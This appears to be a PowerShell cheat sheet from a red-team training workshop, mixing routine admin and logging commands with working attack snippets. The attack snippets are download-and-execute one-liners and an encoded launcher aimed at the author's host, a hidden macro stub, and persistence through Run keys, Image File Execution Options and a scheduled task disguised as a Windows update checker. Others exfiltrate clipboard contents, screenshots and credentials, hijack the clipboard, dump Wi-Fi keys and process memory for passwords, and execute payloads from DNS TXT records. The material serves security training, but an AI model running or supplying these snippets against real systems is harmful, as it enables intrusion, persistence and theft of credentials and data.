(c) 2020 Paweł Maziarz https://aptm.in/ https://aptm.in/omh20

xxxxxxxxxx
help help
help about
​
Update-Help
​
Get-Alias
Get-Command
"string" | Get-Member

xxxxxxxxxx
iex "& { $(irm https://aka.ms/install-powershell.ps1) } -UseMSI"

xxxxxxxxxx
Set-ExecutionPolicy Bypass -Scope Process -Force;•iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

xxxxxxxxxx
Get-WindowsCapability -online|? Name -like '*SSH*'
Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
​
Set-Service sshd -StartupType Automatic
Get-Service sshd
Get-Service sshd | gm
Get-Service sshd | Start-Service

xxxxxxxxxx
Get-Process
ps | gm
​
ps | ConvertTo-Html > ps.html
ps | select path,company,cpu
ps | select name,path,company,cpu | sort cpu -desc -Top 10

xxxxxxxxxx
iwr aptmc.pl/calc | iex
powershell -enc aQB3AHIAIABhAHAAdABtAGMALgBwAGwALwBjAGEAbABjACAAfAAgAGkAZQB4AA==
​
#Sub Document_Open
#  Shell "cmd /c powershell -enc aQB3AHIAIABhAHAAdABtAGMALg[…]",vbHide
#End Sub

xxxxxxxxxx
Get-PSProvider
(ls "HKCU:\Software\Microsoft\Office\*\*\Security\Trusted Documents\TrustRecords").Property

xxxxxxxxxx
New-ItemProperty HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name omh -Value "powershell calc.exe"
New-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name omh -Value "powershell calc.exe"

xxxxxxxxxx
gp HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
gp HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
gp HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
​
Get-Acl HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Format-List

xxxxxxxxxx
ni -f "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\foo.exe"
sp  "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\foo.exe" -name Debugger -Value "powershell -c ps|ogv -wait;#"
​
ni -f "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\foo.exe" | sp -name Debugger -Value "powershell -c ps|ogv -wait;#"

xxxxxxxxxx
gp "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*"|where Debugger|select PSChildName,Debugger

xxxxxxxxxx
while ($True) {
    gcb -f t >> $env:temp\clip
    iwr -me po -i "$env:temp\clip" exfil.aptmc.pl
    sleep 60
}

xxxxxxxxxx
$payload = "iwr aptmc.pl/calc|iex”
while ($True) {
    $clip = gcb -f t
    if ($clip -match "\.exe" -and $clip -notmatch $payload) {
        scb "$clip;$payload`r`n"
    }
    sleep 5
}

xxxxxxxxxx
[void][reflection.assembly]::loadwithpartialname("system.windows.forms")
[system.windows.forms.sendkeys]::sendwait('{PRTSC}')
(gcb -f Image).Save("$env:temp\shot.png")

xxxxxxxxxx
Start-Transcript
Start-Transcript -IncludeInvocationHeader
​
New-Item -Force HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription
Set-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription -Name EnableTranscripting -Value 1

xxxxxxxxxx
New-Item -Force HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Set-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBLockLogging -Name EnableScriptBlockLogging -Value 1

xxxxxxxxxx
gci (Get-PSReadLineOption).HistorySavePath 

xxxxxxxxxx
$action = New-ScheduledTaskAction  -Execute 'powershell.exe' -Argument '-w h -c "&{iwr -useb aptmc.pl/calc|iex}"'
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries
$trigger =  New-ScheduledTaskTrigger -Daily -At 16:32
Register-ScheduledTask -Settings $settings -Action $action -Trigger $trigger -TaskName "Windows Update Checker" -Description "Checks if there is an update available" 

xxxxxxxxxx
Get-ScheduledTask |%{[pscustomobject]@{Name=$_.TaskName;Path=$_.TaskPath;Execute=$_.Actions.Execute;Args=$_.Actions.Arguments}}|Out-GridView 

xxxxxxxxxx
gci -r $HOME|gi -s *|where Stream -ne ':$DATA'|select Filename,Stream
gc remote.ps1 -Stream Zone.Identifier

xxxxxxxxxx
ni -p "HKCU:\Software\Microsoft\Command Processor" -f|sp -n AutoRun -v "mspaint"

xxxxxxxxxx
ls HKLM:\SYSTEM\CurrentControlSet\Enum\HID\*

xxxxxxxxxx
$i=gp HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; $i.MRUList.ToCharArray()|%{$i.$_}

xxxxxxxxxx
ls HKCU:\Software\Sysinternals|select Name

xxxxxxxxxx
([adsisearcher]"objectCategory=computer").FindAll()
([adsisearcher]"servicePrincipalName=MSSQLSvc/*").FindAll()

xxxxxxxxxx
(irm ipinfo.io/json).ip
​
1..254 | % {Resolve-DnsName 46.229.145.$_ -ErrorAction SilentlyContinue}
​
(netsh wlan show profiles)|%{$n=(""+($_ -split ":")[1]).trim(); netsh wlan show profile name="$n" key=clear}|sls "Key Content","SSID name" 

xxxxxxxxxx
(irm "https://dns.google/resolve?name=calc.aptmc.pl&type=txt").answer.data|iex|iex
​
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Resolve-DnsName -Type TXT msg.aptmc.pl).strings))|iex

xxxxxxxxxx
Get-DnsClientCache|select data,entry|Format-List
​
ipconfig /displaydns

xxxxxxxxxx
iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1|iex
$dump=(ps -name Notepad|out-minidump)
iwr https://live.sysinternals.com/tools/strings.exe -OutFile strings.exe
.\strings.exe -accepteula -n 10 $dump | select-string -Context 2 password
​
rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 555 555.dmp full

xxxxxxxxxx
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width, $Height = $Screen.Width, $Screen.Height
$Left , $Top = $Screen.Left, $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$ms=[System.IO.MemoryStream]::new()
$bitmap.Save($ms, [System.Drawing.Imaging.ImageFormat]::jpeg)
$graphic.Dispose()
$imgb64=[System.Convert]::ToBase64String($ms.GetBuffer())       
iwr -me po -b $imgb64 http://aptmc.pl:7777

xxxxxxxxxx
$ExecutionContext.SessionState.LanguageMode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

xxxxxxxxxx
$scr = {
    $uri = 'https://aptmc.pl/ps1/rest/'
    $username = $using:creds.UserName
    $password = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($using:creds.Password))
    $auth = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("${username}:${password}"))
    Invoke-RestMethod -Headers @{Authorization=("Basic {0}" -f $auth)} -Uri $uri -Body @{Users=(Get-LocalUser|ConvertTo-Json)} -Method Post
}
​
$creds = Get-Credential
Invoke-Command -ComputerName localhost,127.0.0.1 -ScriptBlock $scr 

xxxxxxxxxx
(sv -o a -p password "").attributes.add([validatescript]({irm https://aptmc.pl/ps1/steal/ -me po -b $_;return $true}))

xxxxxxxxxx
takeown.exe /f Microsoft.PowerShell.Utility.psm1
icacls.exe  Microsoft.PowerShell.Utility.psm1 /grant administratorzy:f

-- Enjoy! Tak się bawimy na https://aptmasterclass.com/forge/ :)